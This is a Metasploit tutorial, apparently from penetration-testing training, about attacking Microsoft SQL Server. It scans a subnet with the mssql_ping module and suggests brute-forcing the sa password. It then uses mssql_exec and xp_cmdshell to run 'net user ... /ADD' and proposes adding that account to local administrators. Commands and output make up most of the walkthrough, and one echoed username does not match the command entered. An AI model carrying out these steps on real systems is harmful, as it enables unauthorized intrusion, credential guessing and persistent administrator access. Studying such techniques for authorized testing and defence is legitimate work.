Using Metasploit to Find Vulnerable MSSQL Systems
Searching for and locating MSSQL installations inside the internal network can be achieved using UDP foot-printing. When MSSQL installs, it installs either on port 1433 TCP or a randomized dynamic TCP port. If the port is dynamically attributed, querying UDP port 1434 will provide us with information on the server including the TCP port on which the service is listening.
Let us search and load the MSSQL ping module inside the msfconsole.
msf > search mssql Exploits ======== Name Description ---- ----------- windows/mssql/lyris_listmanager_weak_pass Lyris ListManager MSDE Weak sa Password windows/mssql/ms02_039_slammer Microsoft SQL Server Resolution Overflow windows/mssql/ms02_056_hello Microsoft SQL Server Hello Overflow windows/mssql/mssql_payload Microsoft SQL Server Payload Execution Auxiliary ========= Name Description ---- ----------- admin/mssql/mssql_enum Microsoft SQL Server Configuration Enumerator admin/mssql/mssql_exec Microsoft SQL Server xp_cmdshell Command Execution admin/mssql/mssql_sql Microsoft SQL Server Generic Query scanner/mssql/mssql_login MSSQL Login Utility scanner/mssql/mssql_ping MSSQL Ping Utility msf > use auxiliary/scanner/mssql/mssql_ping msf auxiliary(mssql_ping) > show options Module options (auxiliary/scanner/mssql/mssql_ping): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no The password for the specified username RHOSTS yes The target address range or CIDR identifier THREADS 1 yes The number of concurrent threads USERNAME sa no The username to authenticate as USE_WINDOWS_AUTHENT false yes Use windows authentification msf auxiliary(mssql_ping) > set RHOSTS 10.211.55.1/24 RHOSTS => 10.211.55.1/24 msf auxiliary(mssql_ping) > exploit [*] SQL Server information for 10.211.55.128: [*] tcp = 1433 [*] np = SSHACKTHISBOX-0pipesqlquery [*] Version = 8.00.194 [*] InstanceName = MSSQLSERVER [*] IsClustered = No [*] ServerName = SSHACKTHISBOX-0 [*] Auxiliary module execution completed
The first command we issued was to search for any ‘mssql‘ plugins. The second set of instructions was the ‘use scanner/mssql/mssql_ping‘, this will load the scanner module for us.
Next, ‘show options‘ allows us to see what we need to specify. The ‘set RHOSTS 10.211.55.1/24’ sets the subnet range we want to start looking for SQL servers on. You could specify a /16 or whatever you want to go after. We would recommend increasing the number of threads as this could take a long time with a single threaded scanner.
After the ‘run‘ command is issued, a scan is going to be performed and pull back specific information about the MSSQL server. As we can see, the name of the machine is “SSHACKTHISBOX-0” and the TCP port is running on 1433.
At this point you could use the ‘scanner/mssql/mssql_login‘ module to brute-force the password by passing the module a dictionary file. Alternatively, you could also use Fast-Track, medusa, or hydra to do this. Once you successfully guess the password, there’s a neat little module for executing the xp_cmdshell stored procedure.
msf auxiliary(mssql_login) > use auxiliary/admin/mssql/mssql_exec msf auxiliary(mssql_exec) > show options Module options (auxiliary/admin/mssql/mssql_exec): Name Current Setting Required Description ---- --------------- -------- ----------- CMD cmd.exe /c echo OWNED > C:\owned.exe no Command to execute PASSWORD no The password for the specified username RHOST yes The target address RPORT 1433 yes The target port USERNAME sa no The username to authenticate as USE_WINDOWS_AUTHENT false yes Use windows authentification msf auxiliary(mssql_exec) > set RHOST 10.211.55.128 RHOST => 10.211.55.128 msf auxiliary(mssql_exec) > set MSSQL_PASS password MSSQL_PASS => password msf auxiliary(mssql_exec) > set CMD net user bacon ihazpassword /ADD cmd => net user rel1k ihazpassword /ADD msf auxiliary(mssql_exec) > exploit The command completed successfully. [*] Auxiliary module execution completed
Looking at the output of the ‘net user bacon ihazpassword /ADD’, we have successfully added a user account named “bacon”, from there we could issue ‘net localgroup administrators bacon /ADD’ to get a local administrator on the system itself. We have full control over the system at this point.